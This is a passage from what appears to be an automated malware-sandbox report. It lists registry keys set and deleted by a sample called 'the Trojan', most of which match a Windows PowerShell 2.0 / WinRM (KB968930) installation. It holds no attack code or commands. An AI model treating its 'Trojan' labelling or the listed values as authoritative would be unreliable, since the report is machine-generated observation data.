"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "5/11/2016"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 A2 49 89 FE F7 71 A3 4E A7 1D 98 8B 57 A7 52"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathInetsrv" = "%System%\inetsrv"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160511"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008\iis]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\df4:111008]
The process PSCustomSetupUtil.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 17 DD 0F 46 C9 37 91 3D AA FE E4 AE 54 6A 67"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "18 68 49 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSCustomSetupUtil.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B EB 10 6E C7 87 49 6D CB 4E 94 77 C1 6A 3B 9C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 D9 AA 97 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:3416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 1A 45 C7 0A FD 17 F8 8F B8 C5 81 37 2D A0 2A"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "B0 2A 7B 97 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:2800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E3 AA 93 0D B0 CD B0 CF D4 9B 8F 42 22 EE C4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
